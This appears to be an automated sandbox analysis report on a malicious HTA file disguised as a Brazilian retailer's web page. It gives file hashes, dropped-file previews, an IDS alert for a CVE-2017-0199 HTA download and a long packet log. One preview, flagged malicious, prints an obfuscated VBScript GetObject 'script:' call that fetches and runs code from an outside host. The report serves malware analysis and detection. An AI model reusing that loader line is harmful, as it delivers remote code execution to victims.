                                                                                                                                                                                                                            SHA1:01B7E5D57FD450C58C7315F94B8EF0E7B2EA51AA
                                                                                                                                                                                                                            SHA-256:46FF4888C3836721C54C13C9BE29317E6C78A45532453A6E5056CBA36B6CDC70
                                                                                                                                                                                                                            SHA-512:44E3D0755F74386D685399529AE47B12B9763396450815D905CA7B5F393BF167DC363675BB6824339C67407F42818D05F8A4D9920FFBD4B6F72C9AB91F04302C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"204",. . "macros":[{"function":"__v","vtp_dataLayerVersion":1,"vtp_setDefaultValue":false,"vtp_name":"screen"},{"function":"__e"},{"function":"__v","vtp_dataLayerVersion":1,"vtp_setDefaultValue":false,"vtp_name":"product"},{"function":"__jsm","vtp_javascript":["template","(function(){try{return ",["escape",["macro",2],8,16],".map(function(a){return a.id})}catch(a){}})();"]},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"valorSacola"},{"function":"__jsm","vtp_javascript":["template","(function(){try{return ",["escape",["macro",2],8,16],".map(function(a){return a.department})}catch(a){}})();"]},{"function":"__u","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQu
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):3247
                                                                                                                                                                                                                            Entropy (8bit):5.459946526910292
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:vKFlZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:C0pv+GkduSDl6LRa
                                                                                                                                                                                                                            MD5:16AA7C3BEBF9C1B84C9EE07666E3207F
                                                                                                                                                                                                                            SHA1:BF0AFA2F8066EB7EE98216D70A160A6B58EC4AA1
                                                                                                                                                                                                                            SHA-256:7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754
                                                                                                                                                                                                                            SHA-512:245559F757BAB9F3D63FB664AB8F2D51B9369E2B671CF785A6C9FB4723F014F5EC0D60F1F8555D870855CF9EB49F3951D98C62CBDF9E0DC1D28544966D4E70F1
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialog.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonface
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1x1, components 3
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):285
                                                                                                                                                                                                                            Entropy (8bit):3.0648219798227685
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:nStlVlPq4VVO1VMaRq8V8BGaTu0MjDtq+EtUhhk//A/l9ms8:cAVMgVPEudjDtqRUhh/l9ms8
                                                                                                                                                                                                                            MD5:2E85899818427B96F57DB55DD05D06A7
                                                                                                                                                                                                                            SHA1:97DD1C541DF27AB842557955390AD1D48A204706
                                                                                                                                                                                                                            SHA-256:3B8BFA505FC51242D5B2452E3BCE6C89DA12923FB0AD61F00EE72100C9CB3CD0
                                                                                                                                                                                                                            SHA-512:3C57FDCE71D42124BA28ADBDCCFE87BE7DCE26950BE32935ECF4A4AA54E5AFA9AFD46F1EA66E5EABC56956465E65377E4976EDD563FDFCA9CE14AB551A5CC0E4
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:......JFIF.............C.rOVdVGrd]d.yr......................................................C.y.........................................................................."............................................................................................................?......
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                            Size (bytes):271
                                                                                                                                                                                                                            Entropy (8bit):5.250152930854115
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:kD7j1oPayjqEWXil1+UkTdGk69ukJyrUXHht8XOcHv5n:k3j0jqEWMMv5ksr4hov5
                                                                                                                                                                                                                            MD5:05F88C21A3B62133641D007516237440
                                                                                                                                                                                                                            SHA1:8932D42C5ABC16091EE9D1F5CC99BBF992E9552F
                                                                                                                                                                                                                            SHA-256:2F0A789567FA67B2429FA528EC95CE9FCADEB9DF1B78636B2BBBD6F51EC8EF26
                                                                                                                                                                                                                            SHA-512:97BFFDD1AC98D5F79112E10F67F1A6BC64F79FD18B448199DECCA6F8C722FECCE719725C0B8A5809E878AFA929BE61C630E35F3F429B9FE58C11848518E3A6E2
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Preview:OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetObject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")
                                                                                                                                                                                                                            File type:HTML document, Unicode text, UTF-8 text, with very long lines (1835)
                                                                                                                                                                                                                            Entropy (8bit):5.614851252612375
                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                              File name:Archivo-PxFkiLTWYG-23122024095010.hta
                                                                                                                                                                                                                              File size:442'101 bytes
                                                                                                                                                                                                                              MD5:74903ec7a266a9d8d2c5d96d8b9b4965
                                                                                                                                                                                                                              SHA1:c425469eaa1d275f7a30314298a665fc553d5b33
                                                                                                                                                                                                                              SHA256:78df7fdcf6d5a0e70aee7d295f976dabb99c5dd1327fcb82fea548e578897f78
                                                                                                                                                                                                                              SHA512:dbab53d93608b8c5d05fe32c9387396006552ed328e83908b886d921e59a69074b4ae8cbe3d80ab93b50e65a7c1ed087645b58f26a5f5c38514d6b051c72b34e
                                                                                                                                                                                                                              SSDEEP:3072:0Al6oGlpW5P1VZuSLWlUmHpyqOOEgGmlO1gE8MCRCU65ZRoWqfx:ll6vpW59VISL+RZZrlOu
                                                                                                                                                                                                                              TLSH:D194F8361698297E434743CDBC5BBB1662CB605BC5894AE8CAFCCF1E87A9CDE131160D
                                                                                                                                                                                                                              File Content Preview:... <!DOCTYPE html>. <html lang="pt-BR">. <head>. <title data-react-helmet="true">Americanas - Passou, cestou :)</title>. <meta http-equiv="X-UA-Compatible" content="IE=edge" /> . <meta name="viewport" content="width=device-width, initial-scal
                                                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                              2024-12-23T10:48:57.194882+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.11.204975852.95.165.10443TCP
                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.389107943 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.389202118 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.389389038 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.389600039 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.389646053 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.736665010 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.736924887 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.736924887 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.740319014 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.740334988 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.740688086 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.740875006 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.741179943 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.774590015 CET49758443192.168.11.2052.95.165.10
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.774615049 CET49757443192.168.11.203.5.232.230
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.774616957 CET4434975852.95.165.10192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.774645090 CET443497573.5.232.230192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.774758101 CET49758443192.168.11.2052.95.165.10
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.774779081 CET49757443192.168.11.203.5.232.230
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.775047064 CET49758443192.168.11.2052.95.165.10
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.775063038 CET4434975852.95.165.10192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.775073051 CET49757443192.168.11.203.5.232.230
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.775094032 CET443497573.5.232.230192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:55.782253027 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.076339006 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.076410055 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.076459885 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.076503992 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.076554060 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.076571941 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.076600075 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.076795101 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.076795101 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.076807976 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.076987028 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.088191986 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.088378906 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.088452101 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.088718891 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.099961042 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.100219011 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.100236893 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.100528955 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.112251043 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.112458944 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.112478971 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.112782955 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.124008894 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.124308109 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.240542889 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.240803957 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.240816116 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.241027117 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.246434927 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.246663094 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.246674061 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.247203112 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.258420944 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.258637905 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.258650064 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.258909941 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.271626949 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.271889925 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.271902084 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.272110939 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.282887936 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.283097029 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.283108950 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.283339977 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.294250011 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.295209885 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.295222044 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.295548916 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.306246042 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.306530952 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.306541920 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.306828022 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.318146944 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.318341017 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.318352938 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.318734884 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.329140902 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.329353094 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.329365015 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.329627991 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.340384960 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.340569019 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.340579987 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.340838909 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.351121902 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.351337910 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.351386070 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.351645947 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.362190008 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.362832069 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.362843990 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.363229036 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.373215914 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.373430967 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.373441935 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.373712063 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.402786016 CET49760443192.168.11.2092.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.402803898 CET4434976092.205.57.102192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.403191090 CET49760443192.168.11.2092.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.404405117 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.404819965 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.404828072 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.405153036 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.408756971 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.409018993 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.409030914 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.409245968 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.416146994 CET49760443192.168.11.2092.205.57.102
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.416158915 CET4434976092.205.57.102192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.417264938 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.417462111 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.417476892 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.417706966 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.424998045 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.425420046 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.425431013 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.425757885 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.432734013 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.432949066 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.432960987 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.433218002 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.440583944 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.440798044 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.440809965 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.441066027 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.448295116 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.448355913 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.448508978 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.448508978 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.448522091 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.448774099 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.456068993 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.456773996 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.456788063 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.457118034 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.463797092 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.464078903 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.464090109 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.464307070 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.471724033 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.471935987 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.471947908 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.472203970 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.479285955 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.479496002 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.479506969 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.479801893 CET443497573.5.232.230192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.480592966 CET4434975852.95.165.10192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.480626106 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.480740070 CET49757443192.168.11.203.5.232.230
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.480740070 CET49757443192.168.11.203.5.232.230
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.481575012 CET49758443192.168.11.2052.95.165.10
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.483201027 CET49758443192.168.11.2052.95.165.10
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.483206034 CET4434975852.95.165.10192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.483489990 CET4434975852.95.165.10192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.483618021 CET49758443192.168.11.2052.95.165.10
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.483699083 CET49757443192.168.11.203.5.232.230
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.483710051 CET443497573.5.232.230192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.483920097 CET443497573.5.232.230192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.484034061 CET49758443192.168.11.2052.95.165.10
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.484090090 CET49757443192.168.11.203.5.232.230
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.484302044 CET49757443192.168.11.203.5.232.230
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.487236023 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.487420082 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.487432003 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.487644911 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.494842052 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.495075941 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.495088100 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.495346069 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.502599001 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.502823114 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.502835035 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.503068924 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.510320902 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.510535955 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.510552883 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.510816097 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.518115044 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.518326998 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.518345118 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.518580914 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.525890112 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.526124001 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.526141882 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.526216030 CET443497573.5.232.230192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.526221991 CET4434975852.95.165.10192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.526323080 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.533595085 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.533801079 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.533818960 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.534029007 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.541131020 CET44349751142.250.189.226192.168.11.20
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.541392088 CET49751443192.168.11.20142.250.189.226
                                                                                                                                                                                                                              Dec 23, 2024 10:48:56.541409969 CET44349751142.250.189.226192.168.11.20
